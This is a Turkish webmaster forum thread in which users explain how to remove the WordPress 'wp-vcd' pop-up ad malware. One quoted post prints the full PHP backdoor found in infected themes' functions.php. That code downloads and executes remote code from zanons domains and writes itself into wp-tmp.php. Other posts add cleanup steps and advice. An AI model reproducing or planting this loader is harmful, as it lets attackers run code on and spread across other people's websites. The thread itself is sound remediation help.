0
Kayıt Ol

Wordpress Pop-up Reklam Virüsü ( wp-tmp & wp-vcd.php )

60

15.394

  • 14-01-2019, 13:29:05
    #46
    EnB
    EnB
    arkadaşalr aynı sorun bende de var dedikleriniz uyguladım fakat hala onay vermiyor
  • 14-01-2019, 13:51:59
    #47
    Padre
    Padre
    Bu virüs olsada, olmasada wp-tmp.php, wp-vcd.php dosyalarını silmemiz gerekiyor mu?
  • 16-01-2019, 13:09:12
    #48
    constantine38
    constantine38
    Padre adlı üyeden alıntı: mesajı görüntüle
    Bu virüs olsada, olmasada wp-tmp.php, wp-vcd.php dosyalarını silmemiz gerekiyor mu?
    Zaten o dosyaları virüs koyuyor. Normalde o dosyalar yok sistemde.

    Birde tavsiyem mutlaka database şifresini değiştirin. Çünkü database şifresini elde ederlerse dışarıdan siteye bağlanabilir tekrar kodları koyabilir sitenize.
  • 12-04-2019, 23:11:54
    #49
    Serkanalaz
    Serkanalaz
    Çok ama çok teşekkür ederim, bende sorun görmedim ta ki bir arkadaşımın uyarmasıyla birlikte bu problemi yaşamaya başladım ama bulamadım. Bu paylaşımınız sayesinde temizledim AdSense hesabım da bu yüzden gitmişti sağlık olsun en azından artık biliyorum. Emekleriniz için teşekkür ederim.
  • 12-04-2019, 23:34:22
    #50
    DoktorCan
    DoktorCan
    https://blog.nintechnet.com/wordpres...ely-exploited/

    Yuzo Related Posts eklentisi kullananlar bu eklentideki açık yüzünden oluyor
  • 16-04-2019, 13:31:29
    #51
    sKaracanx
    sKaracanx
    Üyeliği durduruldu
    İlgili dosyaları ne kadar silerseniz silin, bırakılan backdoor tespit edilmediği takdirde siteniz 1 hafta temiz yayın sağlar, 1 hafta sonra gene patlar.
  • 16-04-2019, 15:18:44
    #52
    thegodwhip
    thegodwhip
    ilgili dosyaları sildikten sonra, wp-includes klasörü içerisinde post.php açın ve; 
    <?php if (file_exists(dirname(__FILE__) . '/wp-vcd.php')) include_once(dirname(__FILE__) . '/wp-vcd.php'); ?>
    kodunu silin. Bu dosyaları ve kodları sildikten sonra hostinginizde barındırdığınız diğer sitelere de aynı işlemi yapın. çok illet bir virüs bütün sitelere bulaşıyor. bir sitede bırakırsanız tekrar çoğalıyor.
  • 06-07-2019, 05:07:07
    #53
    ceyhunakturk
    ceyhunakturk
    Üyeliği durduruldu
    HelixTm adlı üyeden alıntı: mesajı görüntüle
    Merhabalar,

    Bugün keşvettiğim bir virüsün nasıl kaldırılacağına dair bilgi vermek istedim. İlallah ettiriyor ama sonunda buldum. İşin kötü tarafı öyle bir sistem yapmışlar ki, direkt olarak wordpress klasörlerine gönderiyor reklamı ve sonradan tema değişseniz de birşey fark etmiyor. Pluginler aracılığıyla mevcut temanızın functions.php kısmına bir kod yazdırıyorlar. Bu kod wp-includes klasörünün içerisine wp-tmp.php ve wp-vcd.php isminde dosyalar gönderiyor. Bu dosyaları tabi ki bilmeden burda bulmak neredeyse imkansız. Kullanıcı ilk olarak pluginlerden diye düşünüyor. Arıyor tarıyor bulamıyor. ( Bende öyle yaptım. ) Sonra tema değiştiriyor. ( Değiştirse bile nafile çünkü artık virüs sistemde. ) İşin kötü tarafı admin girişi yaptığınızda bu virüs reklam göstermiyor. O kadar şeytani düşünmüşler ki, kullanıcılardan yorum gelmese ben bile farkına varamayacaktım.
    Bu virüsten kurtulmanın tek yolu temadaki kodları silmek ve ilgili bölümdeki dosyaları silmek.
    Temanın functions.php dosyasının üst kısmında şifrelerle başlayan bir bölüm var, bu kısmı güzel bir silin;
     
<?php if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'XXXXXXXXXXXXXXXXXXXXXX')) { if ( ! function_exists( 'wp_temp_setup' ) ) { $path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI];
 
 
 
 
 
 
 
 
 
 

$div_code_name = "wp_vcd";
$funcfile      = __FILE__;
if(!function_exists('theme_temp_setup')) {
    $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
    if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
        
        function file_get_contents_tcurl($url)
        {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        }
        
        function theme_temp_setup($phpCode)
        {
            $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
           if( fwrite($handle, "<?phpn" . $phpCode))
           {
           }
            else
            {
            $tmpfname = tempnam('./', "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
            fwrite($handle, "<?phpn" . $phpCode);
            }
            fclose($handle);
            include $tmpfname;
            unlink($tmpfname);
            return get_defined_vars();
        }
        
$wp_auth_key='08b370e35d008b6591dd40b0eec23025';
        if (($tmpcontent = @file_get_contents("http://www.zanons.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.zanons.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        }
        
        
        elseif ($tmpcontent = @file_get_contents("http://www.zanons.me/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        } elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
          
        } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
        } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
        } elseif (($tmpcontent = @file_get_contents("http://www.zanons.xyz/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.zanons.xyz/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
        }
        
        
        
        
        
    }
}
 
 
 
 
?>
    Ardından /wp-includes/ klasörünüze girin ve wp-tmp.php ve wp-vcd.php isimli iki dosyayı silin. Pop-up reklamından kurtuldunuz.

    İnternet ortamında emeğe göz dikenler çok fazla. Lütfen functions.php dosyanızı kontrol edin.

    Kaynak : https://www.nusretdogru.com/wordpress-virus-temizleme-pop-up-reklam-viruslerine-son/

    Çok açıklayıcı ve nett teşekkürler.. Peki bir şey soracağım bunu yapmak için ftp de biliyorlar sanırım değil mi? ftp ye girip bu dosyalarda nasıl düzenleme yapıyorlar ben onu anlamıyorum.. sunucu güvenliği ile alakalımı sizce hocam
  • 03-09-2019, 18:07:26
    #54
    morinek
    morinek
    Ne kadar teşekkür etsem azdır, saatlerce bu sorunu çözmeyi araştırıyordum.